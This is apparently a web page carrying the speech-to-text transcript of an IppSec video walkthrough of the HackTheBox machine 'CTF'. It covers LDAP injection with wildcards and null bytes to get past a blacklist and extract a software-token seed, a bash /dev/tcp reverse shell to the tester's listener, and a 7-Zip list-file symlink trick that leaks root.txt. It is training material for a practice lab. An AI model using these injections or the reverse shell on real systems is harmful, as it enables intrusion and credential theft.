HackTheBox - CTF

IppSec · Beginner ·🧠 Large Language Models ·6y ago

Key Takeaways

The video demonstrates a Capture The Flag (CTF) challenge on HackTheBox, utilizing various tools and techniques such as Burp Suite, LDAP injection, and Python scripting to bypass blacklists, enumerate user names, and exploit vulnerabilities.

Full Transcript

what's going on YouTube is epic I'm doing CTF from hack the box which doesn't stand for capture the flag it stands for compressed token format which is that string of digits that changes every minute when doing two-factor login it's most commonly associated with RSA fobs but there's also software implementations like Google Authenticator and things like that I really like this box because number one it starts off with LDAP injection or I don't think we've done that before in a box but number two it's really one long hard problem that becomes relatively easy as long as you enumerate properly and always type what you know because a hurdle you come across 20 minutes into the problem maybe something you found out at the start and if you don't draw that connection you may just be stuck a long time and go down a rabbit all you don't need to go down so with all that being said let's get in as always begin with and maps are - SC for default scripts SV enumerate versions Oh a output all formats pin the end map track and call it CTF and then the IP address which is 10 10 10 122 does take some time to run so I've already ran it looking at the results we have just two ports open the first one is SSH on port 22 and it's running OpenSSH version 7.4 then we have HTTP on port 80 and that's running Apache HTTP D version 2 4 6 and it's also telling us it's a CentOS box so whenever I see centers I translate the name into Red Hat because Red Hat is the paid version of CentOS and paid things generally documented a lot better so I'm just going to google Red Hat httpd versions and then we can probably go to the very first page search 2.4 dot six and we see 246 is supported by Red Hat Enterprise Linux 7 if it was 2 4 3 7 we know we're on a Red Hat Enterprise Linux 8 box and of course you can replace RHEL with centers so this is just letting us know the version not a huge deal but it is always nice to know in case you have to replicate the environment that you are attacking so let's just go and check what's listening on port 80 going over to Firefox and navigating to the page at 10 10 10 122 brings us up to the home page with a nice little note as part of our sdlc software development lifecycle we need to validate a proposed authentication technology based upon software tokens please log in and do a test the server is protecting against some kind of threats for instance brute force saying if you try to brute force you may be banned by up to five minutes if you get banned it is your fault so don't reset the box and please let other people do work while you think a different approach the list of banned IPS or a wall of sheep may be found here and you may not be able to view it while you're a band so let's go check out that wall of sheep and we just see the server status telling us the server is up gives us the uptime of the server and we have a list of banned IPs you could try doing something like an CMD equals who am I to see if you can get this command to change but it doesn't look like it we can look at the page source to see if we have any idea there it's not really telling us anything about how it's running top or why so we can go back to the home page look at the page source to see if there's any hints there and it doesn't look like it so might as well just get with what is asked and do a pen test on this login page so we are granted with username and OD P or one-time password so let's try logging in with please support me on patreon and the one-time password of one two three four click login and we get that user is not found so the first thing I'm going to do is try to do some type of cross-site scripting I'm putting the bold HTML tag to see if this gives bold and we get absolutely no response so doesn't look like that's working I am can try something like double URL encoding to see if that fixes it so if we do : be test one two three four let's just send this over to burp to make it a bit easier to edit so do that make sure burp intercept is on click login go to burp and we can see it's already doing a lot of your line coding so I'm just going to press control-shift you to undo that so we can see what's going on so I definitely do want that your own coded so let's control Z to back out and to WLAN code we just highlight what we want hexed and then press control u so percent is percent to five so we'll do that again and then click forward to see if this bypasses any type of thing and we get user is not found so there is some type of blacklist because it just did not like our carrots but we don't really have any information other than that so just something that we should note in the back of our head press ctrl you to go to the page source to see if there's any hints here and we have we'll change the schema and the next phase of the project if and only if we pass the vulnerability assessment slash pen test at the moment we have chosen an already-existing to contribute in order to store the token string which is 81 digits so at this point I'm going to do a little bit of research because if we go back to this home page let's turn purp intercept off we have software token we know this is a linux box so I'm just going to Google software token Linux I'm gonna see if we come up with anything this very first page is giving us a s token page or github for s token and this is going to create RSA SecurID 128-bit compliant tokens so I'm going to do man s token to see if we have any more information and let's see s token is a software token for crypto authentication now let's see keeps going down just gonna search to speed this up and under basic usage we have pure Mirek 81 digits which that matches what a page source is saying 81 digits and then we also have CTF compress token format so this is what the boxes name is so chances are as token is the application will want to use to generate this token unfortunately for us 4s token to work we need know the seed for the user and we don't even know the user so that's we're gonna start off and just try to enumerate user names someone do root 1 2 3 4 try to login we get user root is not found so let us try the user guest 1 2 3 4 guest isn't found admin 1 2 3 4 admins not found we can try like SQL injections so admin or 1 equals 1 and 1 2 3 4 and we don't get anything back so probably you have to do some type of blacklist filtering but instead of trying to evade a blacklist the quickest thing to do is to brute-force a name unfortunately there is the blacklist protection so we can't use big word list but we should be able to use relatively small ones so I'm going to do find user share SEC list I'm gonna grep for user name and we can see there are two I'm going to do X args WC - L to see the number of lines we have 825 line 1 or a 17 line 1 825 may trigger the blacklist or block so I'm gonna start with this 17 1 so copy this here and then we can take a look at the top user names root admin test info administrator puppet what not so let's do W fuzz - H and we want - D for post data so W fuzz - D we didn't know what parameters the page accepts so going over to burp looking at here we have input user name and input opt so let's do input username is equal to fuzz and input OTP is equal to one two three four and then - w-4 word list we can just do top username short list and then the URL which is HTTP 10 10 10 122 slash login dot PHP I believe going back here yeah wall game dot PHP so go through this and we see everything comes back as 68 lines 233 words the characters is a little bit off but that's because the page is echoing the username back at us so we can just do - - hide words 233 and of course we don't get anything back because none of those appear to be valid users so let's try to fuzz the login form a bit more to find exactly what is blacklisted so I'm gonna go again in the user share SEC list this time going to do fuzzing and copy the special characters file to my working directory we can take a look at this it's just a list of every special character so we can do W fuzz again with that so instead of top user names we'll just replace this with special characters and then we see 68 lines and 229 words so the it's saying 229 words because we just don't get anything remember if we went into Firefox and put something like a carrot or not get a director it doesn't say cannot find user just arrows out so looking at each of these we can't do tilde we can't do excavation point can't do wildcard open parentheses ampersand closed plus equals pipe backslash directors so oddly enough the plus gives us 232 words so let's see exactly why it's doing that if we do user name plus one two three four user plus is not found hide 233 I don't think it's counting plus as a word that's funny but yeah it doesn't count this as a word so that's why it's different so if we wanted to we could do two different approaches to do special characters the first are not special WRL encoding we could change this to dash Z which allows us to specify different inputs we could say file comma and then specify the file and there's a third parameter that has URL encoding so or not you're allocating just encoder I'm gonna put something here it's not gonna work because I don't know what it is I do W fuzz - e encoders and it's going to list what is there we can convert everything into X or double hex so we want to do double hex so if we do comma URI underscore double hex we can see what special characters do and let's see I don't exactly like this because it doesn't do everything like valid URL characters it doesn't in code so instead of doing it that way which some people may think is the correct way I'm just gonna do it the lazy way and specify a different word list so let's go to user share sick list and then fuzzing and then it's like wri hex and double is spelt weird and this is just % to 5 and in case you didn't know percent to five is the hex for a percent so it's kind of like Inception there so to 5 we see - 5 is % so what we're doing with this word list is just hoping that the blacklist is being applied before the application does URL decoding and we're also hoping the application will double your LD code so take 0 X 41 that is always going to be a if you do buffer overflows you'll probably know that address range by off top your head so if you just send the server percent 41 it's going to know to decode that into a but this is where the blacklist may be applied so it's that may say if this is a then block because they don't want you sending a hundred days to cause a buffer overflow so maybe that's how their filter works well if you set this to percent to five for one it will pass this check and then maybe the application will do a decode on it to turn that into percent for one and then it may just decode it again because applications don't want to fail and realize that is a and you have successfully bypassed their blacklist so essentially that is how this double URL encoding is working and we're just going through every single hexadecimal value so let's do that w fuzz again and instead of doing special characters we will do WRI hex and then hope we don't hit the black list because this is sending quite a few characters so looking like everything is good and we got a few characters in before we got blocked we can always check if we got blocked by clicking on a page and if it responds we are not blocked so that is good the first character it barfs on is percent to five zero zero which is null byte so that is good to know that no bite is doing something weird we have percent to five which again percent to eight I don't know what to weight is so let's just do me and ask you again what the hell how do I spell ask oh it's two eyes there we go I don't know why I had a brain fart right there but we can look at 2:8 and that is going to be open parenthesis then two nine is closed parenthesis so we probably should be taking notes so V notes application first at null byte closed open to a we can see that's right here that is gonna be a star so let's go up star and the last one is 5c so search for this not found below search up and backslash so thinking about this a little bit I recognize a lot of these characters as LDAP things not really SQL injection blacklisting parentheses in SQL may be a bit odd I would expect things like dashes pounds and other things to be like causing issues with SQL but just based upon Brent see wildcard and backslash I jump over to LDAP so in order to understand LDAP if this whole thing didn't make sense you have to understand kind of how the oh damn parameters work so let's do Oh dat structure dot note and essentially an LDAP query looks like this it's a bit weird because the like comparison is at the very beginning so it starts off with like a parentheses ampersand or a parentheses ampersand means and this means or so it starts off with this and then you do values so this may be like password is equal to if set rocks and then this could be UID for user is equal to please sub so this query means we could do try think in sequel trims so we could do this being like select star where UID or username is equal to please subscribe and password is equal to epic if this was this this would be select star from where u ID is equal to please subscribe or password equals epic rocks so hopefully that makes sense just keep mine this means an and these combined if you wanted to do multiples you could do like this and then we'll just do that later actually you have to understand that later for nested LDAP queries but knowing this you can see why our application is barfing because we're putting a null byte here which means it's terminating this query so it fails because we ended with these two parentheses we could double to we could test a theory by putting two parentheses and then at all bite and seeing if that succeeds so let's go over to purp to validate what we believe so going over to the proxy we can just go to this request seven two repeater and we'll say test click go and this will say username test what do you username is equal to please sub please sub and then search for please sub user please sub is not found so if we put a percent to five zero zero which is what our W floods did remember this is doing double URL encoding so this is just a plus and then sending null byte we get please sub is not found so what we did we terminated the query whoops right here so what we want to do is add parentheses until this is valid so if we go back here we can do percent to five and then I think it's to nine I think that was the close parentheses we could just do closed and then highlight this convert URL encode all characters and that is to nine so we just want this click go please subscribes not their paces again click go please is not there let's do this one more time click go and we got a match so at three close parentheses her query was successful so we know what these two are because the first parenthesis closed out at UID the second parenthesis doubt or comparison that ampersand but we got a third one here which is weird so we know there's a nest here that we don't know about so it could be like ampersand and then close this out and then open a new one this is unknown territory unknown and then comparing something and then closing that out closing this so we did that because we knew there were three so that meant there was one above additional nest and this is confusing we'll just put a present here if I can tight I'll leave it at pipe cuz I just apparently can't type my mics in the way of looking am viewing my keyboard so this is what the query looks like and again we validated that because they don't bite so let's look at other things we knew what this did cuz that just offset the balance if we put in a parenthesis it's just an uneven balance of parentheses so query fails same with the other way if we do wildcard this one is really different because that's giving us 231 characters so let's try injecting that so going back to book we can just do % 2 5 2 a which is the wild-card click go and we get let's see do we have not found we just get cannot login so this is different this isn't found this is not cannot find user its cannot login so we hit a valid username with a wild-card so if we just brute force all the characters maybe we can find out the user because if there's any user that begins with a and then we have a star it would probably be cannot well again so because it says a wild could not found we can do be not found but instead of doing this all manually let's go back over into w fuzz and do this more automatic so to do that we'll probably have to copy another word list out of user share SEC list so this is going back to let's just do find and I want to do grep care so this the one I want and all care is is a list of everything a to z so what we're going to do w fuzz input username is going to be fuzz which is going to be a character and I'm going to do percent to five which is a percent to a which is the wild card and the word list is just going to be care so click and go we get only one hit back that is L so if we did this back in burp we do L to five to a well C cannot wall again so we can keep going down this path if we do L fuzz we get D then we do LD fuzz we get a and then we do P and you kind of get where we're going if we kept doing this it would show LDAP user and at the end of user we don't get any more hits back so we know that user is probably existing we can validate that by just trying to log in with the user LDAP user one-time password of something and we get cannot well again if we did LDAP use without that the user doesn't exist if we do LDAP user we use and then percent to a and I think a browser will do this URL encoding one two three four cannot login so we know the username is LDAP user if we go back to this we can create a query now so we're injecting here I would app user we know the application is appending this so what we could do is put another comparison and put the variable attribute is equal to star and we won't close this out because applications then do that and what this is going to do is tell us what the tributes are in LDAP and it's kind of how LDAP works again this boxes can be heard if you don't understand LDAP if you search if SEC LDAP maybe there's videos I know we've gone over it I'm just not sure how well but LDAP has a bunch of default attributes and if you went back to I think it's this page in the source at the moment we have trouble chosen an already existing attribute and these are just like variables a user can have so this would be like home directories phone numbers address essentially any extended attribute in Active Directory is a LDAP attribute so if you do LDAP payload so payload all the things yep that's the repo this has one for LDAP injection intruder and LDAP attributes so this is an awesome thing of just all the default LDAP attributes that are there by default so what we want to do is copy that word list into a location I'm just going to locate the tributes is attribute attributes attributes dot txt I do have the payload all the things repo saved on my cally so I'm going to copy this and we're gonna call it attributes dot txt and again you can see the contents of this file that's just this so what we're doing here is going to verify what attributes it zest and I hate typing WRL encoding so we're just going to do this umber Peter and then copy it into W fuzz so I'm just gonna go here and we have to type LDAP user and then we're going to close out the parentheses in the parentheses fuzz and fuzz is going to be each one of these is equal to star which means anything we're not going to close out the parentheses if we did we'd have an uneven number because the application is closing it for us so the first thing I'm gonna do highlight everything control you to your encode it and I see it's only encoding that equal sign because everything else it doesn't have to but we definitely want it to so I'm just going to highlight those things do convert selection URL encode and control use only doing key characters we want to do it all and then I also want to do these parentheses so convert selection URL all characters and then if I highlight the whole thing press control U is going to encode each percent in two percent to five so this is the query I want so let's highlight that control X to cut it or copy and then we want to go back to it w fuzz and we're going to change this input username we'll just do shift insert and that's going to paste or query we want and then change care text which is the word list two attributes text and we can see all the attributes that are valid which is common name CN name male object class pager password SN surname and UID so we want to get the software token out of this and we can do it the same way we did the user name we can brute force any of these fields but I'll leave that as exercise for you we're gonna focus on the software token which we know is eighty-one digits so where would you generally store 81 digits probably the pager attribute because no one uses pagers anymore and it's meant to hold numbers so that's the one we're gonna choose so if we go back to a query we want to do pager is equal to something and that's gonna be a number and we know it's gonna be 81 digits long so I don't want to do what is it the w-4 is 81 times let's create a script to make our lives a bit easier so we'll do VI brut py and begin the creation the first thing we do is let everyone know this is a Python 3 script and then we'll need to do an import statement so we definitely want to do something with the web browser so we're gonna input the request module we'll probably want to import sleep so we'll do from time import sleep because we don't want to be caught brute-forcing we have to be kind then we also need a list of digits so I'm going to do from string import digits and then to make your life easier if you want to go further I'm gonna import ASCII lowercase and all this does is if we do print digits print ASCII lowercase it's going to create those variables for you so python 3 root pi we can see it printed 0 through 9 and a through z so that's all that import statement does then we probably want to give token is equal to nothing and I'm going to do for digit and digits and it's going to go loop through each number we're going to set token is equal to token so right now we're setting it to nothing and then we're going to do query is equal to LDAP user and I'm not WR on coding in here because I believe request will encode this for me if we did percent to five will do a triple encode which I don't know would work so we're just doing percent to 9 which is going to be that closed bracket or a closed parenthesis then to eight which is the open parenthesis and we want to specify a tribute and then present 3d which i think is the equals if we go to a pain man ASCII 3d is equals and we want token and then we'll do digit and to a for wild code so again what that's doing what if I can do a comment like this this would be I would app user then a tribute was pager is equal to token star so that's all that query is and we need to declare a tribute so we'll do a tribute is equal to pager okay so now we can do the post request part so data is equal to input username and that's going to be query and then we want input OTP I think that's all capitals go back to burp OTP is all caps we can say 1 2 3 4 so that is done and now we can crawl so request is equal to request dot post and URL data is equal to data and we also want to declare URL is equal to http 10 10 10 120 to login dot PHP ok and then if cannot log in is in the text of this response print F success and this is digit and we can break out of this so this is going to be our test let's see if this works python 3 root pi and we got nothing so that did not work so let's do proxy is equal to HTTP and this is just localhost 8080 and this will be proxies is equal to proxy no right there my bad it goes in the request portion proxies is equal to proxy I think I set that correct so now we can go back into burp turn it intercept on and let's see if we intercept it we do so mr. repeater and let's look at this do we get anything no we don't let's control you to decode that control you again to code again and I have to closed so that's probably what I screwed up on so go into Brut let's see - nine - nine it's - nine - eight we turn to intercept off let's see if this time we hit it success - so the very first character is - and then if we say token is equal to two we can get the next character but we don't want to be in the business of doing this eighty one time so now like 80 times so we have to create a loop around this let's go to the beginning of a for loop press Shift vida and a visual mode highlight everything and then do I think the greater than sign that is this one that I did to indent everything and I'm going to do a lazy way to get this done while loop is greater than zero and we can say loop is equal to one and then down here we can do else if digit is equal to nine I believe that's can be casted as a string which is why put two nine in quotes I think we need two equals and this will be loop is equal to zero break so what that's doing is if we ever hit nine and we don't have a match then the scripts done and we're going to set loop to zero to end a while loop and exit everything and what we also have to do is say token is equal to token plus digit and I think it's treating everything as string so that's not gonna do math hopefully but we will find out so go here success eight success five four four that was weird so let's see success digit we want to do success token oh we got banned that's why it stopped there crap we do Python brute success two eight two eight five two eight five four maybe we did get banned I don't know why it just really stopped but we definitely need a sleep so I'll put asleep upon success huh let's be extra paranoid and put to sleep on every single request and we can say go and this will be success - wait our token is set to start at two we don't want that so success - and then we're going to wait a little bit because it has to get to eight so that would be probably be eight seconds so three two one I suck at counting or a keeping track of time my head there we go success - eight so let's add a little flair to this to make it so we can see progress so I'm going to do is import sis and we're going to change this print statement so we can do get rid of this and right here we're sleep is we can do sis STD alt right and then slash return to do a line token and token digit so what this is gonna do is keep overriding what it's printing and tell us what digit it's working on so this should look pretty cool as long as we remember to close out that Brenton see click Python root token zero one two and now I'm moving to the next character and this will hopefully go at eight and it will take up to 81 characters so we're just gonna let this go and I'm going to speed up the video because you can imagine how long this would take and there we have the token is complete if we copy this we can do echo - n paste WCC and we have 82 characters so somewhere we have screwed up it's probably that nine the trailing character because well nine is the very last number if you look back at our script well printing out the token so we never go and delete that so we can put a to do and these would be tasks for you brute force all attributes may need to use ASCII lowercase and such and then we got another to do last character printed is bad disregard so some fun things but we got the token I'm going to create token dot txt and paste it just so we always have it and then we can validate it works so if we go to burp intercept is set to OFF if we go back to firefox go to the login form hold app user paste the token we can't login but if you remembered from earlier in the video we use something called s token that's software token so what we're going to do is do app search has token to see if it's an apt and we can just do app install s token to install it and now with an install we can do - - help to see how to use it we want - - token is equal to the token string and then hit enter and then it says enter PIN I'm just going to enter nothing first looks like my computer hung there we go it says pin must be 48 digits use 0 0 0 or 4 zeros for nope and we can copy this and paste it here and we still don't get it working there is one thing to keep in mind when you use time-sensitive tokens or one-time passwords and that is the time so I want to go to burp and we're going to go back into this repeater tab and it doesn't matter which query we do we're just gonna let go and look at the time so that is where the expiration date is 1981 so there's probably not a like security finding but just like a notice of your cookies is set to expire in the past which is weird but looking at the date of the server in this header we can see the server thinks it is I think that's 955 GMT and we are a few minutes or a few minutes ahead of it so what we have to do is set our time so I'm going to go in terminal and when I set a time to be the 57th minute of last hour I'm going to date s 1757 and we see my date didn't change at all so what I'm going to do is we're going to check our settings to see if a VM is taking over time we see time sink is off so what I'm going to do is issue the command time date CTL set M TP 0 this is network time protocol we're disabling it so now when I do date - 1757 we see it updates here so now let's do that has token again I think it's - - pin is equal to 4 zeros so we don't have to do that every time we can copy go to LDAP user paste and we get a different thing now we have command + OTP so I'm going to issue the command Who am I and we're going to go back to the pin it's still the same click Submit user must be a member of root or ADM group and have a registered token to issue command my server so we're probably not a member of root or ADM however now something's making sense if we went back to the query when we enumerated exactly how this worked we have this second one so user must be a member of so we have this nested thing and again we found out it was nested based upon the nor bite and doing enumeration that way so now we have group is equal to ADM or group is equal to root so what if we just put a null byte here and terminated the query after LDAP user so let's try that and maybe we can get the query to never execute the second parameter which is ADM or root so let's go logout well again and we're going to specify LDAP user and then let's go to burp to type this out because I hate doing URL encoding so owed up user one two three and we need to yodel in code all three of these so convert selection URL all characters and we also have on all byte so let's send this in and keep in mind a web browser is going to take each of these and incur that for us so that's why we're not doing double URL encoding so we can go back to s token paste that 2x clip selection clipboard and that just automatically put it in a clipboard a copy and paste click login cannot login so we screwed something up with our user so - 9 - 9 - 9 null byte I thought that worked before we can try let's just do it manually so LDAP user 1 2 3 4 let's intercept this so proxy intercept dawn well again wait to set burp to be intercepted old app user 1 2 3 4 maybe just didn't copy the token quick enough because the said cannot log n so that was probably what happened but let's paste let's see I have seven five one of my clipboard if I do this I have a different token so it's definitely not that but let's do this manually let's go back to this repeater since we don't have a web browser now intercepting to do the double URL encode we do it by just highlighting and pressing ctrl you we can copy this paste that in and now we gotta do this one-time pad so or one-time password copy / paste forward and let's see we are now logged in so the command to issue we can do Who am I paste the token and we get the answer back Apache so we can do let's try a reverse shell bash see then we can do bash - I I think it's this dev TCP 10 10 14 3 9001 and then 0 and 1 let's make sure that's right before we do this so we can turn foxy proxy off pentester monkey grab she'll go to the cheat sheet fast - I greater than ampersand greater than ampersand and then 0 greater than ampersand 1 0 greater than I ever said 1 okay so the reason why I always do bashed SC before it is because this is a very bash thing so if I'm not in a bash shell first this doesn't exist so that's why I wrap everything in bash Jesse so we can try this so to try it we have to do and we'll do that Kat session in this window NCL VMP 9001 copy that go to the browser paste we don't get anything back we don't have a shell so maybe there's a firewall involved let's try a port that is generally allowed outbound for for 3 so copy token issue the command again submit cannot authenticate it's probably just time thing so let's try this again submit cannot authenticate zero six one seven nine two different token paste okay so that time it worked but we didn't set the port to four four three well not getting anything back if we go to a terminal we have a reverse shell as the Apache user awesome so let's do Python - C and port PT y PT y dot spawn then - how do PT y devices I don't know what happened but we just won't be able to upgrade a shell because we got just a weird error message so in order for LDAP to work we have to do things like bind to the LDAP server which is a authentication unless anonymous bind is but let's just check this so let's cat login dot PHP and see how it connects to the LDAP server we have the username as LDAP user we have this password and then we can see LDAP post LDAP colon slash slash CTF dot h DB username connect so search down password and here we go here's the bind request of us trying to connect with the user LDAP user and that password so let's try SSH into the box with LDAP user at 10 10 10 1:22 I'm gonna make sure the password is on my clipboard it is if I do ctrl shift insert so just wait for that login prompt and then ctrl shift insert and we get logged into the box so we have two shells on the box the first one is running as Apache and the second one is running as LDAP user do LS - la we can get user dot txt so we can definitely read this file so let's just enumerate the box some more I'm doing everything in this show because we have a property up PTY where I can do tab autocomplete I can clear the screen etc it's just much nicer to work with than that reverse shell so if we look at the root directory we have a non-standard directory called backup and going into backup we have a bunch of files and if we look at the timestamps on everything everything is within a minute so something runs every minute to create this file there is a dog with no contents and there is also honeypot SH so let's look at honeypot SH to see what's happening and this looks like the script that handles banned users so let's see now date + s so if the path isn't secure we can probably inject somewhere because they're not using absolute paths so the first thing I'm going to do exactly my path to see if there's any non-standard things and what I mean we do which date date is in user bin so user bin so it's going to go here if we had write access to here and created a program called date we could hijack the date Colin honeypot that Sh spot if we touch user local bin test we can't right there so that attack path isn't going to work we got a password and the password is using something out of route text which obviously we can't read so keep the last ten backups this is doing a LS stones if grabbing the 11 and like removing everything out to that so that looks fine now we're getting files from the honeypot to back them all up via dub dub dub HTML uploads 7-zip archive file names it which is that backup name - t7z I'm guessing - T is probably compression format - SNL I don't know - P for password - - generally means arguments are done everything after that is a file and what that's preventing us doing is creating files with like - something to force the execution of a command I know the joke of video I've abused that but there's a few videos that have abused it but since that's there we can't send arguments into 7-zip and then we have truncate - s 0 on the error log to erase it so let's go and look at everything that 7-zip is doing so man 7-zip hey for archive and I want to look at what - T is that is type so we are correct they're specifying the compression type SNL let's see SNL this is going to store symbolic links as links so what this is meaning is if we just put a symbolic link to route route text it's not going to go grab that file and put in the archive it's just going to put the link and the archive so doesn't help us at all and that's about it it does support something called list files and list files means like we can tell 7-zip the names the file or in this zip if that makes sense so if we created the who's gonna make a temp so we can delete this afterward if we created the file please sub and then created please sub without that at sign and then said root root dot txt test ABC it would archive all of these files into the zip so we can trick that into doing a symbolic link having it go to that link and then archive the contents of that link if that makes sense hopefully it does if it doesn't probably make sense after we abuse it so the first thing to do is go into row dub dub dub HTML and see if we can create files so CD for dub dub dub HTML go to uploads and we can't create files we do LSL ale in this directory we can see the apache user can which our net cat shell is the apache user so we can do CD / dub dub dub HTML go into uploads and we can touch and create files so what I'm going to do is go into backup I'm sure we'll do this all from this shell so look at the date we have 50 seconds so or 40 seconds now I'm going to touch please sub now we're going to create a symbolic link just from root dot txt whoops Ln - s root root txt when I call this please sub LS la we go in back up real quick tail - chef Eric log I'm probably didn't hit this time wait do we not have permissions in back oh okay we don't have permissions and back up as the shell so we have to do it from this shell Jo - chef Eric log we probably missed that timing window so let's redo this ver dub dub dub HTML uploads directory is clean so touch at please sub and when - s root root txt 2 VAR dub dub dub HTML uploads please sub make sure we hit that timing window so we see both files so what is going to happen is it's going to see we're doing a list file it's going to go into a file and pull the contents of it and each line in this file is going to try to archive and each file that doesn't exist it's running to the era log which we are viewing so it's going to go into root text and hopefully it can't read the hash that's in root X because that file doesn't exist and if that's the case it's going to output it in error so if we do LS la it hasn't ran yet date it's going to run in a few seconds and there we have it it ran actually twice so we see the hash there if we go back to the snack cat LS la alright - away it deleted the file but there you have it that is the box if you want to do more work I would highly recommend creating a Python script that uses the terminal to log into the application and execute commands here instead of doing a reverse shell you could do this box with just like a command prompt and running commands one at a time like base64 login dot PHP to get the password and then doing the touch commands from here and doing it all with them Python without a reverse shell it's a pretty tough thing to code so and there's also the two do's and the other script so I hope you guys enjoyed the video I'm sorry I don't know a way to get to the actual root user only read the text flag so maybe there'll be a write-up someone else did that actually gets code execution mezrab that's it take care see you all next week

Original Description

Support me on Patreon! https://patreon.com/ippsec 00:52 - Start of Recon, discovering CentOS Version via HTTPD Version 02:15 - Checking out the HTTP Page 03:32 - Checking out login.php 05:15 - Identifying a Secure Token is used, most likely STOKEN 07:05 - Failing to enumerate usernames through BruteForce 09:45 - Fuzzing the login form with special characters to identify a blacklist 11:45 - Trying Double URL Encoding to bypass the BlackList 12:55 - Explaining Double URL Encoding 14:45 - Discovering this is most likely a LDAP Injection 16:50 - Explaining how a LDAP Query Works 19:15 - Identifying the LDAP Query Structure with a Null Byte 20:40 - Injecting the WildCard (*) to enumerate usernames 24:00 - Using Wfuzz to extract the username 26:00 - Enumerating LDAP Attributes that are utilized 30:26 - Creating a python script to extract the Pager Attribute 41:38 - Script complete, lets extract the token 43:45 - Using STOKEN to generate the OTP and logging in 46:00 - Disabling NTP so we can math the server time 46:44 - Discovery of that second half of the original LDAP Query at 16 minutes. 47:33 - Using a Null Byte to remove the GROUP Check. 50:33 - Running Commands 50:25 - Reverse Shell Returned 53:17 - Checking for the LDAP Bind password, then SSHing into the box 55:00 - Going over the /backup directory 58:20 - Using ListFiles to have 7za print our the contents of root.txt
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

The video demonstrates a CTF challenge solution using various tools and techniques, including Burp Suite, LDAP injection, and Python scripting. The challenge requires bypassing blacklists, enumerating user names, and exploiting vulnerabilities to achieve the goal.

Key Takeaways
  1. Enumerate versions of HTTPD and OpenSSH
  2. Check what's listening on port 80
  3. Navigate to the page at 10.10.10.122
  4. Check the list of banned IPs
  5. Try to get the command to change with CMD equals who am I
  6. Use double URL encoding to bypass blacklist filtering
  7. Enumerate user names using a small word list
  8. Use Burp Suite to intercept and analyze HTTP requests
  9. Find user names in a shared list using grep and wc commands
  10. Use Wfuzz to fuzz the login page with a small word list
💡 The key to solving the CTF challenge is to utilize a combination of tools and techniques, including Burp Suite, LDAP injection, and Python scripting, to bypass blacklists, enumerate user names, and exploit vulnerabilities.

Related Reads

📰
Open WebUI: Installation, Features, Errors & Complete Beginner Guide (2026)
Learn to install and use Open WebUI with Docker for a seamless LLM experience
Medium · LLM
📰
Pre-training vs Fine-Tuning: How AI Learns Before It Learns You — Part 25
